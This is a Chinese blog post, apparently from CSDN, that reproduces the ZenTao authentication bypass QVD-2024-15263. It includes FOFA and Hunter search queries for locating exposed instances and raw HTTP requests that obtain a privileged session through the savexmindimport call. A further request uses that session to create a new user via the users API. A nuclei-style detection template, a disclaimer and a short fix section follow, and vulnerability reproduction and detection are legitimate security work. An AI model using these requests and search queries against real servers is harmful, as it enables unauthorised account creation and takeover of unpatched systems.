禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)

最新推荐文章于 2024-07-17 14:12:18 发布
最新推荐文章于 2024-07-17 14:12:18 发布
阅读量712 收藏 10
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46604997/article/details/139475658
版权

0x00、声明

        本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。

中华人民共和国网络安全法

第二十七条 规定

        任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。

0x01、概述

1.1、基本信息

        禅道是一款支持敏捷、瀑布、看板等多种项目模型的开源项目管理软件,可完整覆盖研发项目的需求、任务、缺陷、用例、质量、组织知识库等流程。禅道提供多个版本,包括免费的开源版、付费的企业版、旗舰版、IPD版和云禅道,以及DevOps平台版,满足不同行业和规模的项目管理需求。

1.2、问题描述

        禅道系统存在身份认证绕过,在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。

1.3、指纹

fofa:

app="易软天创-禅道系统" || icon_hash="53755730"

title="Login - ZenTao"

hunter:

web.icon="aed2c3e20dbc00f356524ac58a817e15"

0x02、漏洞复现

2.1、获取cookie

接口:

/api.php

/zentao/api.php

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=jtexhqkbflxckrrolpbc&branch=luqmyuqbafmjejbvjixf HTTP/1.1
Host: {{hostname}}

测试截图:

zentaosid=e16c2177865ee834901c9a3ac995e6d0

2.2、绕过测试

GET /zentao/api.php/v1/lists HTTP/1.1
Cookie: zentaosid=mj7bhmbusq95htqmprc7812va6
Host: {{hostname}}

测试截图,对比如下:

2.3、添加用户接口测试

数据包:

POST /zentao/api.php/v1/users HTTP/1.1
Cookie: zentaosid=944207d463b13efcd8f7493e753036dd
Host: {{hostname}}

{"account":"test","password":"admin@123",
"realname":"test",
"role":"",
"group":"2"
}

测试截图:

0x03、检测POC

id: chandao_permissionbypass

info:
  name: chandao_permissionbypass
  author: gqqwqzq
  severity: medium
  description: chandao_permissionbypass api.php 接口
  reference:
  - https://github.com/
  - https://cve.mitre.org/
  metadata:
    max-request: 1
    shodan-query: ""


requests:
- raw:
  - |+
    @timeout: 30s
    GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=vnkvgtkujgzdavwdejdh&branch=doizyskmvwupcvxischk HTTP/1.1
    Host: {{Hostname}}

  - |+
    @timeout: 30s
    GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=vnkvgtkujgzdavwdejdh&branch=doizyskmvwupcvxischk HTTP/1.1
    Host: {{Hostname}}



  matchers-condition: and
  matchers:
    - type: word
      words: 
        - '"status":"success"'
    - type: status
      status:
        -  200

测试截图:

0x04、修复方案

1、通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

2、升级至不受影响的安全版本。

m0_46604997
关注
专栏目录
禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)
0xSec
04-28 1902
2024年4月,互联网披露禅道系统存在身份认证绕过漏洞情报。经分析,确认该漏洞利用简单,并可能在绕过权限后利用后台其他漏洞实现远程代码执行,建议受影响的客户尽快修复漏洞
QVD-2024-15263禅道项目管理系统身份认证绕过漏洞 [附POC]
薛定谔嘚喵博客
04-29 672
禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)附带POC
hream的博客
05-10 2062
漏洞QVD-2024-15263描述了禅道项目管理系统中的身份认证绕过漏洞
禅道项目管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 1816
禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
禅道身份认证绕过漏洞(QVD-2024-15263)复现
fly夏天的博客
06-19 2138
QVD-2024-15263 禅道身份认证绕过漏洞复现和原理介绍。
禅道项目管理系统 身份验证漏洞分析QVD-2024-15263
shelter1234567的博客
05-03 1570
最近不怎么更新了!向小伙伴说明下 我不是什么组织 更不什么经销号(尽管csdn有很多经销广告号)一确实是下岗了!忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.哎......二是忙着论文及材料的事....三是也看了最近的漏洞,感觉也没啥可分析的 一眼就看出问题所在。有什么可分析的呢!就像医生看看患者如同看萝卜白菜一样.....,那分析反序列化链呢,这也没什么意思啊!话说到此,今儿个就推荐你看这篇文章。有一定难度挑战度,内容还是跟以前一样,以一个挖洞者的视角来讲解分析。
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)POC
05-10
禅道身份认证POC测试payload
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
漏洞的根本原因通常在于软件的编程错误,比如边界检查不足、内存管理不当或未验证的输入等。在QVD-2023-17241的情况下,可能是因为WPS Office在解析特定格式的文件时,未能正确验证数据的完整性和合法性,使得攻击者...
禅道项目管理系统身份认证绕过分析(QVD-2024-15263)
韩束一叶子
07-17 755
下图中上面的是正常访问获取的session,下面的是通过访问poc获得的,可以看到里面最大的区别就是下面的多了一个user字段,所以可以看出认证绕过的原因可能是testcase.savexmindimport()方法下某段代码在session中添加了一个user字段,最终导致绕过的!我们在这行代码下断点后,可以看到添加了cookie请求之后this->app->user的值是存在的,而且this->app-user->account不等于guest,所以继续执行下面的代码。
禅道项目管理一键安装包 v3.2.1 正式版.zip
07-16
禅道3.2.1版本需要注意:   1. 从3.0.stable版本之前升级到话,需要将module/project/css/manageproduct.css文件删除,已解决项目视图产品页面的样式表冲突问题。 2. 如果安装过每日提醒插件,需要更新到最新的每日提醒插件。 3. 特别说明:3.2.1版本不需要再下载补丁3.2.1。 一、修改记录   修复首页滚动条问题。 修复任务不能批量关闭的问题。 修复bug列表上一个,下一个不对的问题。 调整id字段的宽度。 任务增加模块的编辑和查看。 将纯图标的链接形式换成图标和文字组合的形式。 调整初次创建任务再编辑时提示状态必须的完成的逻辑。 修复产品的下拉列表没有按order字段排序的问题。 调整统计视图报表的一些字段错误。
禅道9.8开源版(带32位、64位windows一键安装包).rar
07-30
包含禅道9.8开源版的安装教程和windows一键安装包。关于数据库的后续操作什么的,欢迎访问我的博客:https://mp.csdn.net/mdeditor/97803974
禅道项目管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 2万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
QVD-2024-15263 禅道项目管理系统身份认证绕过漏洞代码分析
qq_62370574的博客
05-07 654
禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器。然后可以通过/api.php/v1/users接口创建用户,在创建用户过程中没有进行进一步的鉴权操作,所以可以创造一个新的管理员用户(虽然回的是403,但实际上创建成功了)中的testcase类中刚好存在对用户进行鉴权,发现用户没有相关功能的使用权限之后执行deny操作。而用户创建相关模块是在。
Goby漏洞更新 禅道研发项目管理系统命令注入漏洞
2401_84247760的博客
04-12 440
人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
漏洞复现】禅道——未授权登入(QVD-2024-15263
LongL_GuYu的博客
07-06 1595
禅道(Zentao)是一款开源的项目管理和协作软件。禅道项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。
0day禅道项目管理系统身份认证绕过漏洞
weixin_43167326的博客
04-26 1385
禅道(ZenTao)是一款国产的,基于LGPL协议和敏捷方法scrum,开源免费的项目管理软件。禅道内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期的全面覆盖。
禅道研发项目管理系统命令注入漏洞(MPS-2023-0418)
murphysec的博客
01-09 1366
禅道是一款国产开源项目管理软件。 禅道研发项目管理系统存在系统命令注入漏洞,具有后台登陆权限的攻击者可以利用此漏洞执行任意命令,进而控制服务器。
禅道项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 3639
禅道是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。
QVD-2024-25692,CVE-2024-38077
最新发布
08-10
很抱歉,您提到的QVD-2024-25692和CVE-2024-38077看起来像是漏洞编号。通常,CVE(Common Vulnerabilities and Exposures)是由美国CERT协调中心分配给信息安全领域的严重漏洞标识符,而QVD可能是某个特定厂商、产品或系统内部使用的漏洞数据库条目。 CVE-2024-38077是一个假设性的漏洞描述,但实际的CVE编号可能会随时间变化,并且需要最新的安全公告来确认其详细信息。这类编号通常是关于软件中存在的安全弱点,可能导致未经授权的访问、数据泄露或其他形式的危害。对于具体的漏洞详情,包括影响范围、修补建议等,应查阅相应的安全更新或官方声明。 至于QVD-2024-25692,如果没有更多的上下文,可能也是一个内部引用或临时的漏洞ID,同样需要官方文档才能获取准确的信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值